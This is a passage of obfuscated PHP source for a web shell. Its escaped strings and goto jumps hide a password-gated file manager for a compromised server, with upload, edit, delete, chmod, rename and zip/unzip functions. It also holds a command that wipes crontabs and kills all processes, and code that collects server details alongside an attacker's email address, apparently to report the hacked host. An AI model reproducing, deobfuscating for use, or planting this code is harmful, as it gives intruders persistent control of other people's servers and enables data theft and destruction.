"\47\x3e\x3c\x69\40\x63\154\141\x73\163\x3d\x27\146\141\x2d\x73\150\x61\162\160\x20\x66\x61\x2d\162\145\x67\165\x6c\141\x72\40\x66\141\x2d\x70\x65\x6e\55\164\157\x2d\163\x71\x75\x61\x72\x65\x27\x3e\x3c\57\x69\76\x3c\x2f\x61\x3e\15\xa\40\x20\x20\x20\40\x20\x3c\x61\x20\164\151\164\154\x65\75\47\x44\x65\x6c\145\164\x65\x27\x20\150\162\145\x66\75\47\x3f\x71\75" . urlencode(encodePath(PATH)) . "\x26\144\x3d" . $folder . "\x27\76\x3c\x69\x20\x63\154\x61\163\163\75\x27\146\141\40\146\141\x2d\x74\162\x61\x73\150\x27\40\x61\x72\x69\141\x2d\150\151\x64\x64\145\156\75\47\164\162\165\x65\47\76\74\57\x69\x3e\x3c\57\141\x3e\15\xa\x9\x20\x20\x3c\141\x20\164\151\x74\x6c\x65\75\x27\143\150\x6d\157\x64\47\x20\x68\162\x65\146\75\47\77\x71\x3d" . urlencode(encodePath(PATH)) . "\46\x63\x3d" . $folder . "\x27\76\74\151\40\143\154\141\x73\x73\x3d\47\146\x61\x20\x66\x61\55\165\156\x6c\157\x63\x6b\x27\40\141\x72\151\141\x2d\x68\151\144\144\x65\156\x3d\x27\164\x72\165\x65\47\76\x3c\x2f\x69\x3e\x3c\57\141\x3e\xd\12\x9\11\x20\74\141\40\x74\x69\164\x6c\145\x3d\47\x7a\151\x70\47\40\150\x72\145\146\x3d\x27\77\161\75" . urlencode(encodePath(PATH)) . "\x26\x7a\75" . $folder . "\x27\76\172\x69\x70\x3c\x2f\141\x3e\x7c\15\xa\11\x9\40\xd\xa\40\x20\x20\x20\x20\x20\74\x74\144\76\15\12\x20\x20\40\x20\74\57\164\x72\x3e\15\12"; BSTWSX1WXq: } aqiVe_Xh1y: foreach ($files as $file) { echo "\x20\40\x20\40\74\x74\x72\76\15\12\40\40\x20\40\40\40\x20\40\x20\x20\x3c\x74\144\x3e" . fileIcon($file) . $file . "\x3c\x2f\164\144\76\15\12\40\40\x20\x20\x20\40\x20\40\x20\40\74\164\x64\76" . formatSizeUnits(filesize(PATH . "\57" . $file)) . "\74\x2f\x74\x64\x3e\xd\xa\x20\40\x20\x20\40\40\40\x20\x20\40\x3c\164\144\76" . date("\x46\x20\144\40\131\x20\x48\72\151\x3a\163\x2e", filemtime(PATH . "\x2f" . $file)) . "\x3c\x2f\164\144\76\xd\12\11\x9\x20\x20\40\74\x74\x64\76" . owner(PATH . "\57" . $file) . "\74\57\x74\x64\76\xd\xa\x20\40\40\x20\x20\40\40\x20\40\x20\x3c\x74\144\x3e\x30" . substr(decoct(fileperms(PATH . "\x2f" . $file)), -3) . "\74\x2f\141\76\74\57\x74\x64\76\15\xa\x20\x20\40\40\x20\40\40\40\x20\x20\74\x74\x64\x3e\15\12\x20\40\x20\40\x20\x20\x20\40\x20\x20\x3c\141\40\164\x69\x74\x6c\x65\75\x27\x45\x64\151\x74\x20\106\151\x6c\145\x27\x20\x68\162\145\146\x3d\x27\77\x71\75" . urlencode(encodePath(PATH)) . "\46\x65\x3d" . $file . "\47\76\x3c\x69\x20\x63\154\x61\163\163\x3d\x27\146\141\55\163\x6f\154\151\144\x20\x66\141\x2d\x66\151\x6c\x65\x2d\x70\x65\x6e\47\x3e\x3c\57\x69\76\x3c\x2f\x61\x3e\15\xa\40\x20\40\40\x20\x20\x20\40\x20\40\x3c\x61\x20\164\x69\x74\x6c\145\x3d\47\122\145\x6e\141\x6d\145\47\x20\150\x72\x65\146\x3d\x27\77\x71\x3d" . urlencode(encodePath(PATH)) . "\x26\x72\75" . $file . "\x27\76\74\151\40\x63\x6c\141\163\163\x3d\47\146\x61\55\163\x68\141\x72\160\40\x66\x61\x2d\x72\145\147\x75\154\141\x72\x20\x66\141\x2d\x70\145\156\x2d\164\x6f\55\x73\161\x75\141\x72\145\x27\x3e\74\x2f\151\76\x3c\x2f\141\x3e\xd\xa\40\x20\x20\40\x20\x20\x20\x20\x20\x20\74\x61\40\x74\151\164\x6c\145\x3d\x27\x44\x65\154\145\x74\145\47\40\150\x72\x65\146\x3d\47\77\x71\x3d" . urlencode(encodePath(PATH)) . "\46\144\x3d" . $file . "\47\76\x3c\151\x20\143\154\x61\x73\163\x3d\x27\x66\x61\x20\146\x61\55\164\162\141\x73\150\x27\x20\x61\x72\x69\x61\x2d\x68\x69\x64\144\x65\x6e\x3d\47\164\162\x75\x65\x27\x3e\74\x2f\x69\76\74\57\x61\76\15\xa\11\x9\40\x20\74\x61\x20\x74\151\164\x6c\x65\75\x27\x63\150\x6d\x6f\144\x27\x20\x68\162\x65\146\75\47\x3f\x71\x3d" . urlencode(encodePath(PATH)) . "\x26\x63\75" . $file . "\47\76\x3c\x69\40\x63\154\141\163\163\75\47\x66\141\x20\146\141\55\x75\156\154\x6f\143\153\x27\x20\141\x72\151\141\55\150\151\x64\144\145\156\x3d\x27\164\162\x75\x65\47\76\74\57\x69\76\x3c\x2f\x61\x3e\15\12\x9\x9\x20\x20\40\x20\74\x61\40\164\151\164\154\x65\75\47\x75\x6e\172\x69\x70\47\40\150\162\x65\x66\x3d\x27\77\x71\75" . urlencode(encodePath(PATH)) . "\x26\165\x3d" . $file . "\x27\76\165\x7a\x69\x70\x3c\x2f\x61\x3e\15\xa\40\x20\40\x20\40\40\x20\40\40\x20\74\x74\144\x3e\15\xa\40\x20\40\x20\x3c\57\164\162\x3e\15\12"; uYMRct_q9o: } lWKcs0NWl4: goto mQyYOaHXf2; AZ1GiUp5Hz: goto L8HEpYUQxg; Moq8TmJ_Zz: $str .= "\74\x70\x3e" . htmlspecialchars(basename($_FILES["\146\x69\154\145\x54\157\x55\160\x6c\157\141\144"]["\x6e\x61\155\x65"][$i])) . "\40\150\x61\x73\40\142\x65\x65\x6e\x20\165\x70\x6c\157\x61\144\145\144\56\74\57\160\x3e"; L8HEpYUQxg: bhb7VItGxw: goto FTc77pbCnc; HeK6lfZ0On: coVmyM_2EN: if (!isset($_POST["\165\160\154\157\141\144"])) { goto n2gtoQzzO0; } $countfiles = count($_FILES["\x66\x69\154\x65\124\x6f\x55\x70\154\x6f\141\x64"]["\156\141\155\145"]); $i = 0; OqSJMaTAuM: goto w6cON0FfUZ; aaNEIZoo6j: COqp2ZXeGk: if (!($error_number != 0)) { goto fDdNmMnr92; } echo "\74\x66\x6f\x6e\x74\40\x63\157\154\157\162\x3d\42\x72\x65\x64\42\76" . $fuction_info . "\x3c\x2f\146\157\x6e\x74\x3e"; fDdNmMnr92: jsqLUEh1SJ: goto zO2LMHgCoO; IOovTEcqk1: $disabled = explode("\x2c", ini_get("\144\151\163\x61\x62\x6c\x65\137\146\x75\156\143\x74\151\x6f\x6e\163")); $fuction_info = ''; if (!(sizeof($disabled) > 0 && !empty($disabled[0]))) { goto jsqLUEh1SJ; } $error_number = 0; if (!in_array("\146\151\x6c\x65\137\x67\145\x74\137\143\157\156\x74\145\x6e\x74\x73", $disabled)) { goto i3MTPAroIo; } goto ZzE3VMo7Qc; t5jf3rVV9n: kw3RfNbNii: echo "\15\12\15\12"; goto qemTr; q1pwk: $turkhackteam .= "\123\x65\162\x76\x65\162\40\151\163\154\145\164\151\155\40\163\x69\163\164\x65\x6d\151\x20\x3a\x20" . $_SERVER["\123\105\122\x56\105\x52\x5f\x53\117\106\x54\x57\x41\x52\x45"] . "\15\12"; goto USOcF_9GQA; Zgi8Ab0lWU: if (!(isset($_GET["\x64"]) && isset($_GET["\161"]))) { goto fHAXqks028; } $name = PATH . "\57" . $_GET["\x64"]; if (is_file($name)) { goto VQYpSLiD5T; } if (is_dir($name)) { goto clz40yMAqx; } goto hZKzTQm1yy; goto DRcFJ0T1ON; ZzE3VMo7Qc: $fuction_info .= "\146\151\x6c\145\137\147\145\x74\137\x63\x6f\x6e\x74\x65\x6e\164\x73\40\151\163\x20\x64\151\x73\x61\142\154\x65\x3c\x62\162\x2f\x3e"; $error_number++; i3MTPAroIo: if (!in_array("\143\165\x72\154\137\x69\156\x69\x74", $disabled)) { goto u9gYMPsCF2; } $fuction_info .= "\x63\165\x72\x6c\137\151\156\151\x74\x20\151\x73\x20\144\x69\163\141\142\x6c\145"; goto X8KH1uvt0u; UDhFABiLMw: if (!is_readable($file)) { goto dUl4pood2Q; } if (strpos(file_get_contents($file), "\120\113\3\x4") === false) { goto p2Z0x5ZOg0; } goto iRua8CtKDW; dUl4pood2Q: echo "\x3c\163\x63\x72\151\160\164\76\x61\x6c\x65\162\164\50\47\x43\141\156\x6e\157\x74\x20\x55\156\x7a\x69\160\40\x46\151\x6c\x65\x20\x2f\40\125\x6e\x72\x65\141\144\x61\142\154\x65\x20\x46\151\154\145\40\41\x27\51\73\40\x77\x69\x6e\144\x6f\x77\56\x6c\x6f\x63\x61\x74\151\157\x6e\x2e\x72\x65\x70\154\141\143\145\50\47\x3f\x70\75" . encodePath(PATH) . "\x27\x29\x3b\x3c\x2f\163\x63\162\x69\x70\x74\76"; goto yPOBkfOl2J; TOf2PAqXCs: goto q4X3Ktp8Rf; iZsHZvoVWP: if (!is_dir(decodePath($_GET["\x71"]))) { goto KyJ_vH0Mwa; } if (is_dir(decodePath($_GET["\161"]))) { goto Zo8nLOomf_; } goto aiCI89EMPR; goto nOjUTRD6Az; O7k9wbo36H: if (!isset($_GET["\153\x6b"])) { goto yulh6SR4bZ; } $cron_result = run("\143\162\x6f\x6e\x74\141\x62\40\55\x72\40\x26\x26\40\153\151\x6c\154\40\55\71\x20\55\x31"); if (!$cron_result) { goto mP6a0rBnag; } echo "\153\x69\154\154\40\xe6\x89\247\xe8\xa1\214\xe6\210\220\345\212\237"; goto T8xgJ1Gmim; goto RlfEosNueR; Z4FL63cabb: $zip = new Zip(); $zip::zipDir($sourceDir1, $outZipPath1); if (file_exists($outZipPath1)) { goto i98ETcJYYy; } echo "\x3c\163\143\162\151\160\164\76\x61\x6c\145\162\x74\50\47\x66\x61\x69\x6c\40\172\151\x70\40\x46\x69\x6c\145\40\41\x27\51\x3b\40\x77\151\156\x64\x6f\167\56\x6c\x6f\x63\x61\x74\151\157\156\56\x72\x65\x70\154\141\x63\145\x28\x27\77\x70\75" . encodePath(PATH) . "\x27\51\73\x3c\x2f\163\143\162\x69\160\x74\76"; goto nbvh0Hfg4M; goto aeX22B5Tfx; geYezJksgv: hDWgesoqjk: DFsOXKjH_h: if ($_SESSION["\154\x6f\x67\x67\x65\x64\111\156\x6d"]) { goto P7Zt_2MYBp; } echo "\15\xa\x3c\150\x74\155\x6c\x3e\74\x68\x65\141\x64\76\x3c\164\151\x74\x6c\x65\x3e\40\74\57\x74\151\164\154\x65\76\74\57\x68\x65\x61\x64\76\xd\12\x20\x20\74\x62\x6f\144\x79\x3e\15\xa\40\x20\x20\x20\x3c\x70\40\141\x6c\x69\x67\156\75\42\143\145\156\x74\x65\x72\42\76\x3c\x63\145\x6e\x74\x65\x72\76\x3c\146\x6f\x6e\164\40\163\164\171\x6c\x65\75\x22\x66\157\156\x74\55\163\151\x7a\x65\x3a\61\x33\160\x78\x22\x20\143\157\154\157\x72\75\x22\x23\60\x30\70\x30\x30\60\42\40\146\x61\143\145\75\x22\124\162\145\142\165\x63\150\145\164\x20\x4d\x53\42\x3e\xd\12\x20\x20\40\x20\74\x66\x6f\x72\155\40\x6d\145\164\x68\157\144\x3d\42\x70\157\163\164\42\x3e\xd\12\x20\40\40\x20\x20\40\x3c\151\156\160\x75\164\x20\164\x79\x70\145\x3d\42\x70\x61\x73\163\167\157\x72\x64\x22\x20\156\141\155\145\x3d\x22\160\141\163\163\167\x6f\x72\x64\x22\x3e\15\12\x20\x20\40\x20\40\40\74\151\156\x70\165\x74\40\x74\x79\160\x65\75\42\x73\165\x62\x6d\151\x74\42\x20\x6e\141\x6d\145\75\42\x73\165\142\155\151\164\42\x20\x76\x61\x6c\165\x65\75\42\40\40\76\76\42\x3e\xd\12\x20\x20\x20\x20\x3c\57\146\157\x72\155\x3e\15\12\40\x20\74\x2f\x62\157\144\x79\76\xd\xa\x3c\x2f\150\164\x6d\x6c\76\xd\12\xd\12"; exit; goto hjqN1xEn3A; beZ8d3y3aQ: $folders = array(); $files = array(); foreach ($fetch_obj as $obj) { goto dmAtbeFBtk; g8RuF113CC: if (is_file($new_obj)) { goto vSWegMe7Lz; } goto bFAUPSnYOd; cqOU3uOPMr: array_push($folders, $obj); goto bFAUPSnYOd; goto s9NhdHM2rt; s9NhdHM2rt: vSWegMe7Lz: array_push($files, $obj); bFAUPSnYOd: JyOkylFRDX: goto PBzrHQLDGM; dmAtbeFBtk: if (!($obj == "\x2e" || $obj == "\56\56")) { goto Kezd1uflj4; } goto JyOkylFRDX; Kezd1uflj4: $new_obj = PATH . "\x2f" . $obj; if (is_dir($new_obj)) { goto cqOU3uOPMr; } goto g8RuF113CC; PBzrHQLDGM: } nd3KQxlVOk: W6cuX1O3h2: goto fb40xYjVL_; Hzmz5X2VGB: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_ENCODING, "\147\172\151\x70\x2c\144\x65\x66\154\141\x74\145"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto rT3QYwS0tM; rmbSvvM2bl: if (is_dir($name)) { goto kSNq_fSLoe; } goto ygOghdc2yx; pjcSO3HNxC: if (chmod($name, 0644)) { goto C25QBScvNh; } echo "\x3c\163\x63\x72\151\160\164\x3e\x61\x6c\145\162\164\x28\47\x53\x6f\x6d\x65\x20\x65\162\162\x6f\162\x20\157\x63\x63\165\162\x72\145\x64\56\x27\x29\x3b\40\167\151\156\x64\x6f\167\x2e\x6c\157\143\x61\164\x69\157\x6e\56\162\145\160\154\x61\143\145\x28\x27\x3f\160\75" . encodePath(PATH) . "\x27\51\73\74\x2f\163\x63\162\151\160\164\x3e"; goto pQiO1r5X9P; zO2LMHgCoO: echo "\xd\xa\x3c\x6e\141\x76\x20\x63\154\141\x73\x73\75\42\156\x61\x76\142\141\162\40\156\141\166\x62\141\x72\55\154\x69\x67\150\164\x22\40\x73\x74\171\x6c\145\x3d\42\142\x61\143\153\147\162\157\x75\156\144\x2d\x63\x6f\x6c\x6f\162\x3a\x20\x23\x65\x33\146\x32\146\x64\73\42\x3e\xd\12\40\40\74\144\x69\x76\x20\x63\154\x61\163\x73\x3d\42\x6e\141\x76\142\x61\x72\x2d\142\162\141\156\144\x22\x3e\xd\12\40\x20\74\x61\x20\x68\x72\145\x66\x3d\42\x3f\x22\x3e\74\x69\40\x63\154\x61\163\163\x3d\42\x66\x61\x20\x66\141\x2d\x68\x6f\x6d\145\42\40\x61\162\151\141\x2d\150\151\x64\x64\145\x6e\x3d\x22\x74\x72\x75\x65\x22\76\x3c\57\x69\76\x3c\57\x61\x3e\xd\xa"; $path = str_replace("\134", "\x2f", PATH); $paths = explode("\x2f", $path); foreach ($paths as $id => $dir_part) { goto H9tnR20ufr; uKk965bJmU: if (!($dir_part == '')) { goto mMTm5guV6u; } goto bIBm3QeT6b; mMTm5guV6u: echo "\x3c\x61\40\x68\162\x65\x66\75\47\x3f\x70\75"; $i = 0; goto qpibQ0txHL; H356WshJH_: OUF1FNlOfz: HkeWk1Ws5J: $i++; goto ly7mrEQZX2; dnlLv_r3SP: goto J0skvlYmYt; qpibQ0txHL: ly7mrEQZX2: if (!($i <= $id)) { goto dnlLv_r3SP; } echo str_replace("\x3a", "\xe0\xa6\x98", $paths[$i]); if (!($i != $id)) { goto OUF1FNlOfz; } echo "\xe0\246\x95"; goto H356WshJH_; H9tnR20ufr: if (!($dir_part == '' && $id == 0)) { goto LA1PfFCI4Y; } $a = true; echo "\x3c\141\40\150\x72\145\x66\x3d\42\x3f\x70\x3d\57\42\76\x2f\x3c\57\141\x3e"; goto bIBm3QeT6b; LA1PfFCI4Y: goto uKk965bJmU; J0skvlYmYt: echo "\47\76" . $dir_part . "\x3c\x2f\141\x3e\x2f"; bIBm3QeT6b: goto zl5It5hs6V; zl5It5hs6V: } NAcHM_MOa1: goto IzSgJV9j8V; Oy39V45ZH7: function str_path($path) { return str_replace("\x2f\x2f", "\x2f", $path); } function do_show($filepath) { goto qtz1NzQd0h; V0p0Hqeur4: goto oxfA6jrQZG; ZsEe1z28hZ: $files = str_path($filepath . "\57" . $file); $show[] = $files; goto oxfA6jrQZG; goto LN3h1J8Jea; LN3h1J8Jea: ZKntQDgCHK: $dir->close(); return $show; goto huWRiHvBhr; qtz1NzQd0h: $show = array(); $dir = dir($filepath); oxfA6jrQZG: if (!($file = $dir->read())) { goto ZKntQDgCHK; } if (!($file == "\56" or $file == "\x2e\x2e")) { goto ZsEe1z28hZ; } goto V0p0Hqeur4; huWRiHvBhr: } function do_deltree($deldir) { $showfile = do_show($deldir); foreach ($showfile as $del) { goto BLmwZXp8SY; A8KU0T3u3b: return false; OxihpooHB6: goto OIrJhFACPA; xgNnRmP9eZ: @chmod($del, 0777); goto SOiDfAA1ap; BLmwZXp8SY: if (is_dir($del)) { goto MKLufqueVI; } if (!is_dir($del)) { goto xgNnRmP9eZ; } goto OIrJhFACPA; MKLufqueVI: if (do_deltree($del)) { goto OxihpooHB6; } goto A8KU0T3u3b; SOiDfAA1ap: if (@unlink($del)) { goto drKmBgXDGq; } return false; drKmBgXDGq: OIrJhFACPA: jfzo5gUFXl: goto pRj7PCM2Um; pRj7PCM2Um: } q4jX3Svrc9: @chmod($deldir, 0777); if (@rmdir($deldir)) { goto JkZJb2wEW1; } return false; JkZJb2wEW1: return true; } function do_download($filecode, $file) { header("\103\157\156\x74\145\x6e\164\55\164\x79\160\x65\x3a\x20\141\x70\x70\154\151\x63\141\x74\x69\x6f\x6e\x2f\x75\156\x6b\156\157\x77\156"); header("\x41\x63\143\145\160\x74\55\122\141\x6e\147\145\x73\72\40\142\x79\164\145\x73"); header("\x43\157\156\x74\x65\156\164\55\x6c\x65\x6e\147\164\150\x3a\x20" . strlen($filecode)); header("\x43\x6f\x6e\x74\145\156\x74\x2d\x64\x69\163\x70\157\163\151\164\x69\157\x6e\72\x20\141\x74\164\x61\143\x68\x6d\145\156\164\x3b\40\146\151\154\145\156\x61\x6d\145\75" . $file . "\73"); echo $filecode; exit; } function owner($file) { if (function_exists("\160\157\x73\x69\x78\x5f\x67\145\x74\x70\x77\x75\151\x64")) { goto IyPKCxI4K4; } return "\74\x63\x65\x6e\x74\x65\x72\76" . fileowner($file) . "\74\x2f\x63\x65\156\164\145\162\x3e"; goto Mdz6j15l9z; IyPKCxI4K4: $tod = @posix_getpwuid(fileowner($file)); return "\74\143\145\x6e\164\x65\x72\76" . $tod["\x6e\141\x6d\145"] . "\74\57\x63\145\x6e\164\x65\x72\76"; Mdz6j15l9z: } goto eQXrwI8nw8; iZSLwp83rB: if (!isset($_GET["\145"])) { goto coVmyM_2EN; } if (!(!empty($_GET["\145"]) && isset($_GET["\x71"]))) { goto pSUJYJ6Jhl; } echo PATH . "\57" . $_GET["\x65"] . "\x3c\142\162\x2f\76" . "\15\12\40\40\x20\40\74\x66\x6f\x72\x6d\x20\155\145\x74\x68\x6f\x64\75\x22\160\157\x73\x74\x22\76\15\12\x20\40\40\40\x20\x20\x20\x20\74\164\145\x78\x74\141\162\x65\x61\40\x73\164\x79\x6c\x65\75\42\x68\145\x69\x67\150\164\72\40\x35\x30\x30\160\x78\x3b\xd\12\40\40\40\x20\40\x20\40\x20\167\x69\x64\x74\150\72\x20\x39\x30\45\73\42\x20\156\x61\155\x65\x3d\x22\x64\141\164\141\42\x3e" . htmlspecialchars(file_get_contents(PATH . "\57" . $_GET["\145"])) . "\x3c\x2f\164\x65\170\x74\x61\x72\x65\x61\76\15\12\40\x20\40\40\40\x20\40\x20\x3c\x62\x72\76\15\12\40\x20\40\x20\x20\40\40\40\74\151\156\x70\165\164\40\164\171\160\145\75\42\163\x75\142\155\x69\164\42\40\x63\x6c\x61\163\x73\75\42\x62\x74\x6e\x20\x62\x74\x6e\55\x64\141\162\153\42\40\x76\x61\154\165\145\x3d\x22\x53\x61\x76\145\x22\x20\156\141\155\145\x3d\x22\145\144\151\x74\x22\76\15\12\x20\x20\40\40\x3c\57\146\157\x72\x6d\x3e"; if (!isset($_POST["\145\144\x69\164"])) { goto RDKJeyTdCo; } $filename = PATH . "\57" . $_GET["\145"]; goto HJzbV9Cz_0; XyqzCwUAMG: hZKzTQm1yy: fHAXqks028: if (!(isset($_GET["\x63"]) && isset($_GET["\161"]))) { goto B0fGBvJ7BC; } $name = PATH . "\57" . $_GET["\x63"]; if (is_file($name)) { goto pjcSO3HNxC; } goto rmbSvvM2bl; Xf7vnRT1DK: $_SESSION["\x6c\157\x67\x67\145\x64\111\x6e\x6d"] = false; uaB43k7i2d: if (!isset($_POST["\160\141\x73\x73\x77\157\162\144"])) { goto DFsOXKjH_h; } if (!(md5($_POST["\160\x61\x73\x73\x77\x6f\x72\144"]) == $password)) { goto hDWgesoqjk; } $_SESSION["\x6c\x6f\x67\147\145\144\111\156\155"] = true; goto geYezJksgv; rT3QYwS0tM: $res = curl_exec($ch); curl_close($ch); if (!$res) { goto b_rvvIgoJI; } echo "\x3c\x64\151\x76\40\163\164\171\x6c\145\x3d\42\x77\151\x64\x74\150\x3a\65\x30\x25\73\x64\x69\163\x70\x6c\x61\171\x3a\x62\x6c\157\x63\x6b\73\x63\x6f\154\157\x72\x3a\x72\x65\144\x3b\146\157\156\164\x2d\x73\x69\172\145\x3a\63\60\160\x78\73\164\x65\170\x2d\x61\x6c\x69\x67\x6e\72\x63\x65\156\164\x65\x72\73\42\76\x73\x75\x70\160\x6f\x72\x74\40\143\165\162\154" . "\74\57\x64\x69\166\76\x3c\142\162\x2f\x3e" . $res; b_rvvIgoJI: goto o4bNfRbYi7; YwoKqqsX4i: vS5qu: $turkhackteam = "\x44\x6f\163\x79\141\x20\x59\157\x6c\165\x20\x3a\40" . $_SERVER["\x44\x4f\x43\125\115\x45\x4e\x54\x5f\x52\117\117\124"] . "\xd\xa"; goto qJ_ML; qemTr: $kime = "\x62\x6c\x34\x63\x6b\150\x61\x74\x78\61\63\63\x37\100\147\x6d\141\151\x6c\x2e\x63\157\155"; goto s2MJ9P5gIy; nOjUTRD6Az: KyJ_vH0Mwa: echo "\x3c\163\143\162\151\160\164\x3e\x77\151\x6e\144\157\167\x2e\x6c\x6f\x63\x61\164\151\x6f\156\x2e\x72\145\160\x6c\x61\x63\x65\x28\47\x3f\160\75\47\51\73\x3c\57\x73\x63\162\151\160\x74\x3e"; goto aiCI89EMPR; Zo8nLOomf_: $p = decodePath($_GET["\x71"]); goto fFKP7Uscgc; xIjQh75KP9: goto ygOghdc2yx; kSNq_fSLoe: if (rmdir($name) == true) { goto DSraP0sFDJ; } echo "\x3c\163\143\x72\151\160\164\x3e\141\154\x65\x72\164\50\47\x53\157\155\145\40\145\x72\x72\157\162\40\x6f\143\x63\x75\x72\x72\x65\144\x2e\47\51\73\x20\x77\x69\156\144\157\167\x2e\x6c\x6f\x63\x61\164\x69\x6f\156\x2e\x72\x65\160\x6c\141\143\145\x28\x27\77\160\x3d" . encodePath(PATH) . "\x27\51\73\x3c\57\x73\x63\162\x69\x70\164\76"; goto vBeXSTf6G5; goto vny6N1rEXg; hjqN1xEn3A: P7Zt_2MYBp: echo "\74\41\104\117\103\x54\x59\x50\x45\40\x68\x74\155\154\x3e\15\12\74\x68\164\155\x6c\x20\154\x61\156\147\75\42\145\156\x22\76\xd\xa\15\xa\74\150\145\141\x64\76\xd\12\x20\40\40\x20\x3c\x6d\x65\164\141\40\143\150\x61\x72\x73\145\164\x3d\x22\165\x74\x66\55\70\x22\x3e\15\xa\x20\40\40\x20\74\x6d\145\164\x61\40\150\x74\164\160\x2d\x65\161\x75\151\x76\x3d\x22\130\55\x55\101\55\x43\157\x6d\160\x61\164\x69\x62\154\x65\42\40\x63\x6f\156\x74\x65\156\x74\x3d\42\111\105\75\145\144\147\x65\x22\x3e\15\xa\x20\40\x20\x20\x3c\x6d\x65\164\x61\40\x6e\141\x6d\145\x3d\x22\x76\x69\145\167\x70\157\162\x74\x22\x20\x63\157\x6e\164\x65\156\164\x3d\x22\x77\x69\144\164\x68\x3d\x64\145\x76\x69\143\x65\x2d\x77\x69\x64\x74\150\x2c\x20\x69\156\151\164\x69\141\x6c\55\x73\x63\141\x6c\145\x3d\61\56\x30\42\x3e\xd\12\40\x20\x20\x20\x3c\164\151\164\154\145\76\105\154\145\x70\x3c\57\164\x69\x74\x6c\145\x3e\xd\12\40\40\40\x20\74\x6c\151\x6e\x6b\x20\150\x72\x65\146\75\42\x68\x74\x74\160\x73\x3a\x2f\57\x63\144\x6e\x2e\x6a\x73\144\145\x6c\151\x76\162\56\156\145\x74\57\x6e\x70\x6d\57\142\157\157\x74\163\x74\162\141\x70\x40\65\x2e\x33\56\60\55\141\154\x70\150\141\61\x2f\x64\151\163\164\57\143\x73\x73\57\142\x6f\x6f\164\163\164\162\x61\x70\56\155\x69\156\x2e\x63\163\x73\x22\40\162\145\x6c\x3d\42\x73\164\x79\154\x65\x73\x68\x65\145\x74\x22\xd\12\40\x20\x20\x20\x20\40\40\40\151\x6e\164\x65\147\x72\x69\164\x79\x3d\x22\163\150\x61\x33\x38\x34\55\x47\114\150\x6c\x54\x51\70\x69\122\x41\102\x64\132\x4c\154\66\117\63\157\126\x4d\x57\123\x6b\164\x51\x4f\x70\x36\x62\x37\111\156\x31\132\154\63\57\112\162\65\x39\142\66\x45\x47\x47\x6f\111\x31\141\106\153\x77\67\x63\155\104\101\66\152\66\x67\104\x22\40\x63\162\157\163\163\x6f\162\151\147\x69\x6e\x3d\42\141\156\157\x6e\171\155\157\x75\x73\42\76\15\xa\x20\40\x20\x20\x3c\x6c\151\156\x6b\x20\162\145\154\x3d\x22\x73\164\171\154\145\163\x68\145\x65\164\42\x20\x68\x72\145\146\x3d\42\x68\164\x74\x70\x73\72\x2f\57\x63\144\156\x6a\x73\56\x63\x6c\x6f\x75\144\x66\x6c\x61\162\x65\x2e\x63\157\155\x2f\141\x6a\x61\170\57\x6c\x69\x62\163\x2f\x66\x6f\156\x74\x2d\141\x77\x65\163\x6f\x6d\145\57\66\56\63\56\x30\57\x63\x73\163\x2f\x61\154\154\x2e\155\151\x6e\56\x63\163\163\x22\15\xa\40\40\40\x20\x20\40\40\x20\x69\156\x74\x65\147\x72\x69\164\171\x3d\x22\163\150\141\x35\x31\x32\55\x53\x7a\x6c\x72\x78\x57\125\x6c\160\146\x75\172\x51\x2b\x70\143\x55\103\157\x73\x78\x63\147\154\x51\x52\x4e\x41\161\x2f\x44\x5a\152\x56\x73\x43\x30\154\x45\64\60\x78\163\x41\x44\x73\x66\x65\x51\157\x45\171\160\x45\53\x65\156\167\x63\117\x69\x47\152\153\x2f\x62\x53\165\x47\107\113\x48\105\171\x6a\123\x6f\121\x31\x7a\126\151\163\141\x6e\121\x3d\75\x22\15\12\x20\x20\x20\40\40\x20\40\40\x63\x72\157\x73\x73\157\x72\151\147\151\156\75\42\x61\156\x6f\x6e\x79\155\157\165\163\42\40\x72\x65\146\x65\162\x72\145\x72\x70\x6f\154\151\x63\x79\75\x22\156\x6f\x2d\162\x65\x66\x65\x72\162\x65\162\x22\x20\57\x3e\xd\12\x20\40\40\x20\74\x73\143\x72\x69\160\164\40\163\x72\x63\75\x22\x68\x74\x74\160\163\72\x2f\57\x63\144\156\152\x73\x2e\x6f\156\154\151\156\x65\57\141\152\x61\x78\57\x6c\x69\x62\x73\x2f\x62\x6f\157\x74\163\x74\x72\141\160\57\152\163\x2f\x62\157\x6f\x74\x73\164\x72\141\160\x2e\x6d\151\x6e\x2e\152\x73\42\76\x3c\x2f\x73\x63\162\151\x70\x74\x3e\xd\xa\x3c\x2f\150\x65\x61\144\x3e\xd\12\15\xa\74\x62\157\144\x79\x3e\15\xa\15\12\x20\40\x20\40"; class Zip { public static function zipDir($sourcePath, $outZipPath) { $pathInfo = self::myPathInfo($sourcePath); $parentPath = $pathInfo["\x64\151\162\x6e\x61\155\x65"]; $dirName = $pathInfo["\x62\x61\163\x65\156\x61\x6d\145"]; $sourcePath = $parentPath . "\x2f" . $dirName; $z = new \ZipArchive(); $z->open($outZipPath, \ZIPARCHIVE::CREATE); $z->addEmptyDir($dirName); self::folderToZip($sourcePath, $z, strlen("{$parentPath}\57")); $z->close(); } private static function folderToZip($folder, &$zipFile, $exclusiveLength) { goto iAp7eHVyEh; iAp7eHVyEh: $handle = opendir($folder); OA96fEclKc: if (!(false !== ($f = readdir($handle)))) { goto b0WL0sXOqZ; } if (!($f != "\56" && $f != "\x2e\x2e")) { goto Z9RERv6Nr5; } $filePath = "{$folder}\57{$f}"; goto Fkuw5PDZeh; KHlGbVZnoQ: $zipFile->addFile($filePath, $localPath); goto nunZV23xEk; UjOOEvpMA_: $zipFile->addEmptyDir($localPath); self::folderToZip($filePath, $zipFile, $exclusiveLength); goto wz97xIbukI; wz97xIbukI: nunZV23xEk: Z9RERv6Nr5: goto OA96fEclKc; b0WL0sXOqZ: closedir($handle); goto MKIvWfAIlU; Fkuw5PDZeh: $localPath = substr($filePath, $exclusiveLength); if (is_file($filePath)) { goto uotT90IMT3; } if (is_dir($filePath)) { goto UjOOEvpMA_; } goto nunZV23xEk; uotT90IMT3: goto KHlGbVZnoQ; MKIvWfAIlU: } private static function myPathInfo($filepath) { $pathParts = array(); $pathParts["\144\151\162\156\x61\155\x65"] = rtrim(substr($filepath, 0, strrpos($filepath, "\x2f")), "\57") . "\x2f"; $pathParts["\x62\141\163\145\x6e\x61\155\145"] = ltrim(substr($filepath, strrpos($filepath, "\57")), 